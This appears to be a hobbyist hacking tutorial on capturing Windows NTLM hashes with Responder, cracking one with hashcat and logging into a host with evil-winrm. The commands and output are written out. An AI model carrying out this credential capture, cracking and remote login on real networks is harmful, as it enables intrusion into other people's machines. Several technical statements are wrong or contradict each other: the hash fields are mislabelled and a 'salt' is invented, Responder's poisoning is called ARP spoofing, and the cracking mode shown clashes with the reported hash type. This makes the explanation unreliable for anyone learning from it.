_..-----.._
` - _ x X : ..-. .-.. :
` - _ x X : : : : : :
/| / /~~~ | / /~~~ /~~, //
/ | / /-- | / /-- /-.-' //
/ |/ /__ |/ /__ / | .
` - _ x X : :_.: :._: :
` - _ x X :__..---..__:
┌───────────────────────────────────────────────────┐
| Hashs NTLM, Arp Poison & Cracking The Hash |
\───────────────────────────────────────────────────/
|[0x1] What is Responder
|[0x2] How does it work?
|[0x3] Arp Poison
|[0x4] Cracking The Hash
└───────────────────────────────────────────────────┘
Hi Today I'm going to talk to you about Arp poison, How to use an NTLM hash capture tool (responder), How NTLM hash capture works and how Crack The Hash works!
I apologize for the delay in posting something new, but anyway, let's get down to business :3
[0x1] What is Responder.
Responder is a tool for performing arp poison attacks and NTLM hash captures while on a local network.
In addition, the Responder can behave like a fake DHCP server, assigning fake IP addresses to devices that request an IP address.
Currently, the original creator on the SpiderLabs github archived the project in 2020, but thanks to it being opensource there are updated versions.
and perfect for use, like this one: https://github.com/lgandx/Responder which is officially being used as the default tool in kali linux
[0x2] How does it work?
The operation of the responder needs to be divided into several parts, as it has several functions, the one I will mention first is the NTLM(NT Lan Manager) hash capture.
Let's start by talking about how windows tries to access files remotely. When windows tries to access a shared folder such as smb, it sends an authentication request to the server.
The server responds by requesting a user ID, and the user sends an NTLM hash to prove access and identity.
- And how would the responder act on this?
Well, he'd be like the remedy for all this, listening to the Hash that gets through the traffic :3
but how would he do that? well, let's talk about Arp Spoofing/Poison.
[0x3] Arp Spoofing/Poison
The responder sends spoofed ARP packets to trick devices on the network into thinking that the responder's MAC address is the default gateway address
So everything that is passed on to the network will be passed on to this gateway so that the responder has control of what passes through the network
to make it clearer, I'll show you a exemple below, uwu
┌───────────────────────────────────────────────────────────────────────┐
|(kitty) ---[Request]------> (Bezumiya) ----[Request]--------> (Server)|
|(kitty) <--[Reponse]------- (Bezumiya) <---[Reponse]--------- (Server)|
|(kitty) ---[Hash]---------> (Bezumiya) -------[Hash]--------> (Server)|
└───────────────────────────────────────────────────────────────────────┘
we can see that the victim: kitty is making a simple connection to a server and I Bezumiya am intercepting all the traffic of this connection, and consequently I get the user's NTLM hash.
For those unfamiliar with windows hashes, I'll show you an example of an NTLM hash below:
> Bezumiya:502:aad3c435b514a4eeaad3b935b51304fe:c46b9e588fa0d112de6f59fd6d58eae3:::
Looking at the whole hash Let's look at the first part of it
|- Bezumiya -> is my username (obviously)
|- 502 -> is a user identifier
|- aad3c435b514a4eeaad3b935b51304fe -> that's the NTLM hash
|- c46b9e588fa0d112de6f59fd6d58eae3 -> that's the hash salt
\- ::: These ":" are the fields reserved for additional information
Capturing this Hash We can crack the hash to see the password in plain text
[0x4] Crack the Hash
in this case and the most common breaking the hash is what we need to get an entry on our machine, for this we can break using the hashcat, john, or other tools, an example of this is using the hashcat.
Hashcat is a tool for breaking hashes using keywords and cpu/gpu processing, it is widely used for password cracking attacks. Now I'm going to show you how it works to break our hash below.
┌─────────────────────────────────────────────────────────────────────────────────────────────────────┐
|bezumiya@x00r:~$ hashcat -m 1000 -o cracked_ntlm.txt hash_ntlm.txt /usr/share/wordlists/rockyou.txt
|hashcat (v5.1.0) starting...
| //a lot of text from the hashcat output
|Session..........: hashcat
|Status...........: Cracked
|Hash.Type........: NetNTLMv2
|Hash.Target......: bezumiya::502:56d4c27f***c9e4f:10137BD6CFB5E...000000
|Time.Started.....: Wed Feb 12 00:11:01 2020 (0 secs)
|Time.Estimated...: Wed Feb 12 00:11:01 2020 (0 secs)
|Guess.Base.......: File (rockyou.txt)
|Guess.Queue......: 1/1 (100.00%)
|Speed.#1.........: 1786.3 kH/s (8.29ms) @ Accel:256 Loops:1 Thr:64 Vec:1
|Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
|Progress.........: 32768/14344386 (0.23%)
|Rejected.........: 0/32768 (0.00%)
|Restore.Point....: 0/14344386 (0.00%)
|Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
|Candidates.#1....: 123456 -> elenutza
|Hardware.Mon.#1..: Temp: 48c
└─────────────────────────────────────────────────────────────────────────────────────────────────────┘
then we have our cracked hash in cracked_ntlm.txt now that we have the password in plain text we can go into rdp/smb/winrm to do something, in this case I'm going to use winrm to connect to the host.
┌─────────────────────────────────────────────────────────────────────────────────────────────────────┐
|bezumiya@x00r:~$ evil-winrm -i 10.10.1.16 -u bezumiya -p 1l0v3y0u
|Evil-WinRM shell v3.5
|
|Info: Establishing connection to remote endpoint
|
|*Evil-WinRM* PS C:\Users\bezumiya\Documents>
└─────────────────────────────────────────────────────────────────────────────────────────────────────┘
this is just the beginning. there are many ways to log in to other pcs on the same network. one example I'll give you will be the pass the hash which I'll talk about soon.
So that's it, I hope you'll stay and read more of my writing, if you have anything to say or tips to make me better, call me on discord... anything I'm always willing to help and to listen
thx for read this trash <3